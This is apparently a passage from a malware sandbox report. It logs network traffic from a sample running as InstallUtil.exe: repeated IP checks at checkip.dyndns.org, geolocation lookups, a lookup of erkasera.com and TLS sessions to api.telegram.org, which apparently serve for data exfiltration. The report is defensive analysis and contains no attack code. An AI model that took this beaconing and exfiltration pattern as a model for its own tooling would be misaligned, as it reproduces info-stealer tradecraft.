Nov 5, 2024 11:05:16.295959949 CET	49838	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:16.300750017 CET	80	49838	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:16.738720894 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:16.738818884 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:16.740560055 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:16.740576982 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:16.740859985 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:16.742145061 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:16.783334970 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:16.783411980 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:16.783431053 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:17.087768078 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:17.137676001 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:17.137693882 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:17.138284922 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:17.138329029 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:17.138375044 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:17.166435957 CET	80	49838	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:17.167797089 CET	49844	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:17.167839050 CET	443	49844	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:17.167917013 CET	49844	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:17.168313026 CET	49844	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:17.168323994 CET	443	49844	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:17.215779066 CET	49838	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:17.772655010 CET	443	49844	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:17.774411917 CET	49844	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:17.774446011 CET	443	49844	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:17.911473989 CET	443	49844	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:17.911603928 CET	443	49844	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:17.911756992 CET	49844	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:17.912147999 CET	49844	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:17.915936947 CET	49850	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:17.921681881 CET	80	49850	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:17.921780109 CET	49850	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:17.921863079 CET	49850	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:17.926697969 CET	80	49850	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:18.794475079 CET	80	49850	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:18.803766012 CET	49856	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:18.803797007 CET	443	49856	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:18.803864956 CET	49856	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:18.804168940 CET	49856	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:18.804181099 CET	443	49856	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:18.840811014 CET	49850	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:19.418327093 CET	443	49856	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:19.420224905 CET	49856	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:19.420245886 CET	443	49856	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:19.560048103 CET	443	49856	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:19.560163975 CET	443	49856	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:19.560221910 CET	49856	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:19.560708046 CET	49856	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:19.564440012 CET	49850	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:19.565062046 CET	49862	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:19.570389032 CET	80	49850	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:19.570472002 CET	49850	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:19.570496082 CET	80	49862	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:19.570554018 CET	49862	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:19.570687056 CET	49862	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:19.576359034 CET	80	49862	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:20.443250895 CET	80	49862	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:20.444740057 CET	49868	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:20.444782972 CET	443	49868	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:20.444853067 CET	49868	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:20.445152044 CET	49868	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:20.445158958 CET	443	49868	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:20.497299910 CET	49862	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:21.042011976 CET	443	49868	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:21.043569088 CET	49868	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:21.043586016 CET	443	49868	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:21.180227041 CET	443	49868	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:21.180341959 CET	443	49868	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:21.180408001 CET	49868	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:21.180972099 CET	49868	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:21.184027910 CET	49862	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:21.185105085 CET	49874	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:21.189449072 CET	80	49862	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:21.189527988 CET	49862	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:21.190002918 CET	80	49874	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:21.190076113 CET	49874	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:21.190170050 CET	49874	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:21.194891930 CET	80	49874	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:22.067552090 CET	80	49874	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:22.068959951 CET	49880	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:22.069024086 CET	443	49880	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:22.069118977 CET	49880	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:22.069353104 CET	49880	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:22.069370031 CET	443	49880	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:22.122107983 CET	49874	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:22.674933910 CET	443	49880	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:22.703686953 CET	49880	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:22.703717947 CET	443	49880	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:22.842092037 CET	443	49880	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:22.842216015 CET	443	49880	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:22.842266083 CET	49880	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:22.842711926 CET	49880	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:22.845982075 CET	49874	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:22.846992970 CET	49886	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:22.851228952 CET	80	49874	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:22.851300955 CET	49874	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:22.851866007 CET	80	49886	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:22.851936102 CET	49886	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:22.852019072 CET	49886	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:22.856901884 CET	80	49886	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:23.947024107 CET	80	49886	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:23.948160887 CET	49891	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:23.948199034 CET	443	49891	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:23.948288918 CET	49891	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:23.948550940 CET	49891	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:23.948564053 CET	443	49891	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:23.950422049 CET	80	49886	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:23.950473070 CET	49886	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:24.543518066 CET	443	49891	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:24.545178890 CET	49891	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:24.545217991 CET	443	49891	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:24.683511972 CET	443	49891	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:24.683605909 CET	443	49891	188.114.97.3	192.168.2.7
Nov 5, 2024 11:05:24.683670998 CET	49891	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:24.684227943 CET	49891	443	192.168.2.7	188.114.97.3
Nov 5, 2024 11:05:29.891551018 CET	49886	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:29.896986008 CET	80	49886	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:29.897077084 CET	49886	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:29.898705959 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:29.898749113 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:29.898818016 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:29.899260044 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:29.899272919 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:30.820724010 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:30.820873976 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:30.822173119 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:30.822185040 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:30.822416067 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:30.823771954 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:30.871341944 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:30.871467113 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:30.871488094 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:31.172713041 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:31.215907097 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:31.215920925 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:31.216372967 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:31.216454029 CET	443	49922	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:31.216517925 CET	49922	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:59.250193119 CET	80	49703	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:59.250310898 CET	49703	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:06:22.302578926 CET	80	49838	132.226.247.73	192.168.2.7
Nov 5, 2024 11:06:22.302649975 CET	49838	80	192.168.2.7	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 11:04:44.255186081 CET	51144	53	192.168.2.7	1.1.1.1
Nov 5, 2024 11:04:44.568897009 CET	53	51144	1.1.1.1	192.168.2.7
Nov 5, 2024 11:04:49.912543058 CET	54678	53	192.168.2.7	1.1.1.1
Nov 5, 2024 11:04:49.919842958 CET	53	54678	1.1.1.1	192.168.2.7
Nov 5, 2024 11:04:51.361936092 CET	57339	53	192.168.2.7	1.1.1.1
Nov 5, 2024 11:04:51.369167089 CET	53	57339	1.1.1.1	192.168.2.7
Nov 5, 2024 11:05:15.827562094 CET	53433	53	192.168.2.7	1.1.1.1
Nov 5, 2024 11:05:15.834232092 CET	53	53433	1.1.1.1	192.168.2.7
Nov 5, 2024 11:05:18.795527935 CET	60789	53	192.168.2.7	1.1.1.1
Nov 5, 2024 11:05:18.802630901 CET	53	60789	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 11:04:44.255186081 CET	192.168.2.7	1.1.1.1	0xb077	Standard query (0)	erkasera.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:49.912543058 CET	192.168.2.7	1.1.1.1	0x7eb7	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:51.361936092 CET	192.168.2.7	1.1.1.1	0x477b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:05:15.827562094 CET	192.168.2.7	1.1.1.1	0x2c9a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:05:18.795527935 CET	192.168.2.7	1.1.1.1	0xb5f6	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 11:04:44.568897009 CET	1.1.1.1	192.168.2.7	0xb077	No error (0)	erkasera.com		188.132.193.46	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:49.919842958 CET	1.1.1.1	192.168.2.7	0x7eb7	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 11:04:49.919842958 CET	1.1.1.1	192.168.2.7	0x7eb7	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:49.919842958 CET	1.1.1.1	192.168.2.7	0x7eb7	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:49.919842958 CET	1.1.1.1	192.168.2.7	0x7eb7	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:49.919842958 CET	1.1.1.1	192.168.2.7	0x7eb7	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:49.919842958 CET	1.1.1.1	192.168.2.7	0x7eb7	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:51.369167089 CET	1.1.1.1	192.168.2.7	0x477b	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:04:51.369167089 CET	1.1.1.1	192.168.2.7	0x477b	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:05:15.834232092 CET	1.1.1.1	192.168.2.7	0x2c9a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:05:18.802630901 CET	1.1.1.1	192.168.2.7	0xb5f6	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 11:05:18.802630901 CET	1.1.1.1	192.168.2.7	0xb5f6	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

erkasera.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	132.226.247.73	80	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:04:49.934726000 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:04:50.810302019 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:50 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b83ca2d68d93883e883e60b5d0f5c305 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Nov 5, 2024 11:04:50.818316936 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 5, 2024 11:04:51.081300974 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:50 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3be7229169000adefa003a352994822e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Nov 5, 2024 11:04:52.201838970 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 5, 2024 11:04:52.462960958 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:52 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 475a9ad3ac97b0f76ddafa500ba33f7d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49703	132.226.247.73	80	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:04:53.228600025 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 5, 2024 11:04:54.109234095 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:53 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7055fe9a2b9d109b4452899bb969ba72 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49706	132.226.247.73	80	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:04:54.872726917 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:04:55.743571997 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:55 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 10f0bec3ab06cfaae224689a9fa8dfe5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49708	132.226.247.73	80	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:04:56.523338079 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:04:57.400939941 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7f7c0cdc310a526277663d5061918684 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49720	132.226.247.73	80	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:04:58.161645889 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:04:59.029938936 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:58 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 60719be194e1b6a2d803faa5b37614d7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49732	132.226.247.73	80	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:04:59.789591074 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:05:00.698910952 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:00 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1231d13a0bb1f1ec03ab55ee7fc5795d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49746	132.226.247.73	80	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:01.694130898 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:05:09.819113016 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:09 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3ff37fdd73481cf0c8f619d8fafd2553 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49795	132.226.247.73	80	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:09.449215889 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
